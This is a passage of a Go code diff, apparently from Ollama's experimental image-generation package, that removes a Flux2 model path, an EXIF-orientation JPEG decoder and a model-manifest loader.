-			TeaCache:          *teaCache,
-			TeaCacheThreshold: float32(*teaCacheThreshold),
-			FusedQKV:          *fusedQKV,
-		})
-		if err == nil {
-			err = saveImageArray(img, *out)
-		}
-	case *flux2Flag:
-		m := &flux2.Model{}
-		if loadErr := m.Load(*modelPath); loadErr != nil {
-			log.Fatal(loadErr)
-		}
-		// Load input images with EXIF orientation correction
-		var loadedImages []image.Image
-		for _, path := range inputImages {
-			img, loadErr := loadImageWithEXIF(path)
-			if loadErr != nil {
-				log.Fatalf("Failed to load image %s: %v", path, loadErr)
-			}
-			loadedImages = append(loadedImages, img)
-		}
-		// When input images provided and user didn't override dimensions, use 0 to match input
-		fluxWidth := int32(*width)
-		fluxHeight := int32(*height)
-		if len(loadedImages) > 0 && *width == 0 && *height == 0 {
-			// Both unset, will auto-detect from input
-		} else if len(loadedImages) > 0 && *width == 0 {
-			fluxWidth = 0 // Compute from height + aspect ratio
-		} else if len(loadedImages) > 0 && *height == 0 {
-			fluxHeight = 0 // Compute from width + aspect ratio
-		}
-		var img *mlx.Array
-		img, err = m.GenerateFromConfig(context.Background(), &flux2.GenerateConfig{
-			Prompt:        *prompt,
-			Width:         fluxWidth,
-			Height:        fluxHeight,
-			Steps:         *steps,
-			GuidanceScale: float32(*cfgScale),
-			Seed:          *seed,
-			CapturePath:   *gpuCapture,
-			InputImages:   loadedImages,
+		img, err = m.GenerateFromConfig(&zimage.GenerateConfig{
+			Prompt:      *prompt,
+			Width:       int32(*width),
+			Height:      int32(*height),
+			Steps:       *steps,
+			Seed:        *seed,
+			CapturePath: *gpuCapture,
+			LayerCache:  *layerCache,
 		})
 		if err == nil {
 			err = saveImageArray(img, *out)
@@ -320,8 +264,6 @@ func detectModelKind(modelPath string) (string, error) {
 			switch index.ClassName {
 			case "FluxPipeline", "ZImagePipeline":
 				return "zimage", nil
-			case "Flux2KleinPipeline":
-				return "flux2", nil
 			}
 		}
 		return "zimage", nil
@@ -342,12 +284,3 @@ func detectModelKind(modelPath string) (string, error) {

 	return cfg.ModelType, nil
 }
-
-// loadImageWithEXIF loads an image from a file path with EXIF orientation correction.
-func loadImageWithEXIF(path string) (image.Image, error) {
-	data, err := os.ReadFile(path)
-	if err != nil {
-		return nil, fmt.Errorf("read file: %w", err)
-	}
-	return imagegen.DecodeImage(data)
-}
--- a/x/imagegen/image.go
+++ b/x/imagegen/image.go
@@ -1,268 +0,0 @@
-//go:build mlx
-
-package imagegen
-
-import (
-	"bytes"
-	"encoding/base64"
-	"fmt"
-	"image"
-	_ "image/jpeg"
-	"image/png"
-	"os"
-	"path/filepath"
-
-	"github.com/ollama/ollama/x/imagegen/mlx"
-)
-
-// SaveImage saves an MLX array as a PNG image file.
-// Expected format: [B, C, H, W] with values in [0, 1] range and C=3 (RGB).
-func SaveImage(arr *mlx.Array, path string) error {
-	img, err := ArrayToImage(arr)
-	if err != nil {
-		return err
-	}
-
-	if filepath.Ext(path) != ".png" {
-		path = path + ".png"
-	}
-
-	f, err := os.Create(path)
-	if err != nil {
-		return err
-	}
-	defer f.Close()
-
-	return png.Encode(f, img)
-}
-
-// EncodeImageBase64 encodes an MLX array as a base64-encoded PNG.
-// Expected format: [B, C, H, W] with values in [0, 1] range and C=3 (RGB).
-func EncodeImageBase64(arr *mlx.Array) (string, error) {
-	img, err := ArrayToImage(arr)
-	if err != nil {
-		return "", err
-	}
-
-	var buf bytes.Buffer
-	if err := png.Encode(&buf, img); err != nil {
-		return "", err
-	}
-
-	return base64.StdEncoding.EncodeToString(buf.Bytes()), nil
-}
-
-// ArrayToImage converts an MLX array to a Go image.RGBA.
-// Expected format: [B, C, H, W] with values in [0, 1] range and C=3 (RGB).
-func ArrayToImage(arr *mlx.Array) (*image.RGBA, error) {
-	shape := arr.Shape()
-	if len(shape) != 4 {
-		return nil, fmt.Errorf("expected 4D array [B, C, H, W], got %v", shape)
-	}
-
-	// Transform to [H, W, C] for image conversion
-	// Free intermediate arrays to avoid memory leak
-	squeezed := mlx.Squeeze(arr, 0)
-	transposed := mlx.Transpose(squeezed, 1, 2, 0)
-	squeezed.Free()
-	img := mlx.Contiguous(transposed)
-	transposed.Free()
-	mlx.Eval(img)
-
-	imgShape := img.Shape()
-	H := int(imgShape[0])
-	W := int(imgShape[1])
-	C := int(imgShape[2])
-
-	if C != 3 {
-		img.Free()
-		return nil, fmt.Errorf("expected 3 channels (RGB), got %d", C)
-	}
-
-	// Copy to CPU and free GPU memory
-	data := img.Data()
-	img.Free()
-
-	// Write directly to Pix slice (faster than SetRGBA)
-	goImg := image.NewRGBA(image.Rect(0, 0, W, H))
-	pix := goImg.Pix
-	for y := 0; y < H; y++ {
-		for x := 0; x < W; x++ {
-			srcIdx := (y*W + x) * C
-			dstIdx := (y*W + x) * 4
-			pix[dstIdx+0] = uint8(clampF(data[srcIdx+0]*255+0.5, 0, 255))
-			pix[dstIdx+1] = uint8(clampF(data[srcIdx+1]*255+0.5, 0, 255))
-			pix[dstIdx+2] = uint8(clampF(data[srcIdx+2]*255+0.5, 0, 255))
-			pix[dstIdx+3] = 255
-		}
-	}
-
-	return goImg, nil
-}
-
-func clampF(v, min, max float32) float32 {
-	if v < min {
-		return min
-	}
-	if v > max {
-		return max
-	}
-	return v
-}
-
-// DecodeImage decodes image bytes with EXIF orientation applied.
-func DecodeImage(data []byte) (image.Image, error) {
-	orientation := readJPEGOrientation(data)
-
-	img, _, err := image.Decode(bytes.NewReader(data))
-	if err != nil {
-		return nil, err
-	}
-
-	return applyOrientation(img, orientation), nil
-}
-
-// readJPEGOrientation extracts EXIF orientation from JPEG bytes.
-// Returns 1 (normal) for non-JPEG or if orientation not found.
-func readJPEGOrientation(data []byte) int {
-	if len(data) < 2 || data[0] != 0xFF || data[1] != 0xD8 {
-		return 1 // Not JPEG
-	}
-
-	r := bytes.NewReader(data[2:])
-	for {
-		var marker [2]byte
-		if _, err := r.Read(marker[:]); err != nil || marker[0] != 0xFF {
-			return 1
-		}
-
-		if marker[1] == 0xE1 { // APP1 (EXIF)
-			var lenBytes [2]byte
-			if _, err := r.Read(lenBytes[:]); err != nil {
-				return 1
-			}
-			segLen := int(uint16(lenBytes[0])<<8|uint16(lenBytes[1])) - 2
-			if segLen < 14 {
-				r.Seek(int64(segLen), 1)
-				continue
-			}
-			seg := make([]byte, segLen)
-			if _, err := r.Read(seg); err != nil {
-				return 1
-			}
-			if string(seg[:4]) == "Exif" && seg[4] == 0 && seg[5] == 0 {
-				return parseTIFFOrientation(seg[6:])
-			}
-			continue
-		}
-
-		if marker[1] == 0xD9 || marker[1] == 0xDA {
-			return 1 // EOI or SOS
-		}
-		if marker[1] >= 0xD0 && marker[1] <= 0xD7 {
-			continue // RST markers
-		}
-
-		var lenBytes [2]byte
-		if _, err := r.Read(lenBytes[:]); err != nil {
-			return 1
-		}
-		segLen := int(uint16(lenBytes[0])<<8|uint16(lenBytes[1])) - 2
-		if segLen > 0 {
-			r.Seek(int64(segLen), 1)
-		}
-	}
-}
-
-func parseTIFFOrientation(tiff []byte) int {
-	if len(tiff) < 8 {
-		return 1
-	}
-
-	var big bool
-	switch string(tiff[:2]) {
-	case "MM":
-		big = true
-	case "II":
-		big = false
-	default:
-		return 1
-	}
-
-	u16 := func(b []byte) uint16 {
-		if big {
-			return uint16(b[0])<<8 | uint16(b[1])
-		}
-		return uint16(b[1])<<8 | uint16(b[0])
-	}
-	u32 := func(b []byte) uint32 {
-		if big {
-			return uint32(b[0])<<24 | uint32(b[1])<<16 | uint32(b[2])<<8 | uint32(b[3])
-		}
-		return uint32(b[3])<<24 | uint32(b[2])<<16 | uint32(b[1])<<8 | uint32(b[0])
-	}
-
-	if u16(tiff[2:4]) != 42 {
-		return 1
-	}
-
-	ifdOffset := u32(tiff[4:8])
-	if int(ifdOffset)+2 > len(tiff) {
-		return 1
-	}
-
-	numEntries := u16(tiff[ifdOffset : ifdOffset+2])
-	for i := range int(numEntries) {
-		offset := ifdOffset + 2 + uint32(i)*12
-		if int(offset)+12 > len(tiff) {
-			break
-		}
-		if u16(tiff[offset:offset+2]) == 0x0112 { // Orientation tag
-			o := int(u16(tiff[offset+8 : offset+10]))
-			if o >= 1 && o <= 8 {
-				return o
-			}
-			return 1
-		}
-	}
-	return 1
-}
-
-func applyOrientation(img image.Image, orientation int) image.Image {
-	if orientation <= 1 || orientation > 8 {
-		return img
-	}
-
-	bounds := img.Bounds()
-	w, h := bounds.Dx(), bounds.Dy()
-
-	outW, outH := w, h
-	if orientation >= 5 {
-		outW, outH = h, w
-	}
-
-	out := image.NewRGBA(image.Rect(0, 0, outW, outH))
-	for y := range h {
-		for x := range w {
-			var dx, dy int
-			switch orientation {
-			case 2:
-				dx, dy = w-1-x, y
-			case 3:
-				dx, dy = w-1-x, h-1-y
-			case 4:
-				dx, dy = x, h-1-y
-			case 5:
-				dx, dy = y, x
-			case 6:
-				dx, dy = h-1-y, x
-			case 7:
-				dx, dy = h-1-y, w-1-x
-			case 8:
-				dx, dy = y, w-1-x
-			}
-			out.Set(dx, dy, img.At(x+bounds.Min.X, y+bounds.Min.Y))
-		}
-	}
-	return out
-}
--- a/x/imagegen/manifest.go
+++ b/x/imagegen/manifest.go
@@ -1,237 +0,0 @@
-package imagegen
-
-import (
-	"encoding/json"
-	"fmt"
-	"io"
-	"os"
-	"path/filepath"
-	"runtime"
-	"strings"
-)
-
-// ManifestLayer represents a layer in the manifest.
-type ManifestLayer struct {
-	MediaType string `json:"mediaType"`
-	Digest    string `json:"digest"`
-	Size      int64  `json:"size"`
-	Name      string `json:"name,omitempty"` // Path-style name: "component/tensor" or "path/to/config.json"
-}
-
-// Manifest represents the manifest JSON structure.
-type Manifest struct {
-	SchemaVersion int             `json:"schemaVersion"`
-	MediaType     string          `json:"mediaType"`
-	Config        ManifestLayer   `json:"config"`
-	Layers        []ManifestLayer `json:"layers"`
-}
-
-// ModelManifest holds a parsed manifest with helper methods.
-type ModelManifest struct {
-	Manifest *Manifest
-	BlobDir  string
-}
-
-// DefaultBlobDir returns the default blob storage directory.
-func DefaultBlobDir() string {
-	home, err := os.UserHomeDir()
-	if err != nil {
-		home = "."
-	}
-	switch runtime.GOOS {
-	case "darwin":
-		return filepath.Join(home, ".ollama", "models", "blobs")
-	case "linux":
-		return filepath.Join(home, ".ollama", "models", "blobs")
-	case "windows":
-		return filepath.Join(home, ".ollama", "models", "blobs")
-	default:
-		return filepath.Join(home, ".ollama", "models", "blobs")
-	}
-}
-
-// DefaultManifestDir returns the default manifest storage directory.
-func DefaultManifestDir() string {
-	home, err := os.UserHomeDir()
-	if err != nil {
-		home = "."
-	}
-	return filepath.Join(home, ".ollama", "models", "manifests")
-}
-
-// LoadManifest loads a manifest for the given model name.
-// Model name format: "modelname" or "modelname:tag" or "host/namespace/name:tag"
-func LoadManifest(modelName string) (*ModelManifest, error) {
-	manifestPath := resolveManifestPath(modelName)
-
-	data, err := os.ReadFile(manifestPath)
-	if err != nil {
-		return nil, fmt.Errorf("read manifest: %w", err)
-	}
-
-	var manifest Manifest
-	if err := json.Unmarshal(data, &manifest); err != nil {
-		return nil, fmt.Errorf("parse manifest: %w", err)
-	}
-
-	return &ModelManifest{
-		Manifest: &manifest,
-		BlobDir:  DefaultBlobDir(),
-	}, nil
-}
-
-// resolveManifestPath converts a model name to a manifest file path.
-func resolveManifestPath(modelName string) string {
-	// Parse model name into components
-	// Default: registry.ollama.ai/library/<name>/<tag>
-	host := "registry.ollama.ai"
-	namespace := "library"
-	name := modelName
-	tag := "latest"
-
-	// Handle explicit tag
-	if idx := strings.LastIndex(name, ":"); idx != -1 {
-		tag = name[idx+1:]
-		name = name[:idx]
-	}
-
-	// Handle full path like "host/namespace/name"
-	parts := strings.Split(name, "/")
-	switch len(parts) {
-	case 3:
-		host = parts[0]
-		namespace = parts[1]
-		name = parts[2]
-	case 2:
-		namespace = parts[0]
-		name = parts[1]
-	}
-
-	return filepath.Join(DefaultManifestDir(), host, namespace, name, tag)
-}
-
-// BlobPath returns the full path to a blob given its digest.
-func (m *ModelManifest) BlobPath(digest string) string {
-	// Convert "sha256:abc123" to "sha256-abc123"
-	blobName := strings.Replace(digest, ":", "-", 1)
-	return filepath.Join(m.BlobDir, blobName)
-}
-
-// GetTensorLayers returns all tensor layers for a given component.
-// Component should be "text_encoder", "transformer", or "vae".
-// Tensor names are path-style: "component/tensor_name" (e.g., "text_encoder/model.embed_tokens.weight").
-func (m *ModelManifest) GetTensorLayers(component string) []ManifestLayer {
-	prefix := component + "/"
-	var layers []ManifestLayer
-	for _, layer := range m.Manifest.Layers {
-		if layer.MediaType == "application/vnd.ollama.image.tensor" && strings.HasPrefix(layer.Name, prefix) {
-			layers = append(layers, layer)
-		}
-	}
-	return layers
-}
-
-// GetConfigLayer returns the config layer for a given path.
-func (m *ModelManifest) GetConfigLayer(configPath string) *ManifestLayer {
-	for _, layer := range m.Manifest.Layers {
-		if layer.MediaType == "application/vnd.ollama.image.json" && layer.Name == configPath {
-			return &layer
-		}
-	}
-	return nil
-}
-
-// ReadConfig reads and returns the content of a config file.
-func (m *ModelManifest) ReadConfig(configPath string) ([]byte, error) {
-	layer := m.GetConfigLayer(configPath)
-	if layer == nil {
-		return nil, fmt.Errorf("config %q not found in manifest", configPath)
-	}
-
-	blobPath := m.BlobPath(layer.Digest)
-	return os.ReadFile(blobPath)
-}
-
-// ReadConfigJSON reads and unmarshals a config file.
-func (m *ModelManifest) ReadConfigJSON(configPath string, v any) error {
-	data, err := m.ReadConfig(configPath)
-	if err != nil {
-		return err
-	}
-	return json.Unmarshal(data, v)
-}
-
-// OpenBlob opens a blob for reading.
-func (m *ModelManifest) OpenBlob(digest string) (io.ReadCloser, error) {
-	return os.Open(m.BlobPath(digest))
-}
-
-// HasTensorLayers returns true if the manifest has any tensor layers.
-func (m *ModelManifest) HasTensorLayers() bool {
-	for _, layer := range m.Manifest.Layers {
-		if layer.MediaType == "application/vnd.ollama.image.tensor" {
-			return true
-		}
-	}
-	return false
-}
-
-// ModelInfo contains metadata about an image generation model.
-type ModelInfo struct {
-	Architecture   string
-	ParameterCount int64
-	Quantization   string
-}
-
-// GetModelInfo returns metadata about an image generation model.
-func GetModelInfo(modelName string) (*ModelInfo, error) {
-	manifest, err := LoadManifest(modelName)
-	if err != nil {
-		return nil, fmt.Errorf("failed to load manifest: %w", err)
-	}
-
-	info := &ModelInfo{}
-
-	// Read model_index.json for architecture, parameter count, and quantization
-	if data, err := manifest.ReadConfig("model_index.json"); err == nil {
-		var index struct {
-			Architecture   string `json:"architecture"`
-			ParameterCount int64  `json:"parameter_count"`
-			Quantization   string `json:"quantization"`
-		}
-		if json.Unmarshal(data, &index) == nil {
-			info.Architecture = index.Architecture
-			info.ParameterCount = index.ParameterCount
-			info.Quantization = index.Quantization
-		}
-	}
-
-	// Fallback: detect quantization from tensor names if not in config
-	if info.Quantization == "" {
-		for _, layer := range manifest.Manifest.Layers {
-			if strings.HasSuffix(layer.Name, ".weight_scale") {
-				info.Quantization = "FP8"
-				break
-			}
-		}
-		if info.Quantization == "" {
-			info.Quantization = "BF16"
-		}
-	}
-
-	// Fallback: estimate parameter count if not in config
-	if info.ParameterCount == 0 {
-		var totalSize int64
-		for _, layer := range manifest.Manifest.Layers {
-			if layer.MediaType == "application/vnd.ollama.image.tensor" {
-				if !strings.HasSuffix(layer.Name, "_scale") && !strings.HasSuffix(layer.Name, "_qbias") {
-					totalSize += layer.Size
-				}
-			}
-		}
-		// Assume BF16 (2 bytes/param) as rough estimate
-		info.ParameterCount = totalSize / 2
-	}
-
-	return info, nil
-}
--- a/Show More
+++ b/Show More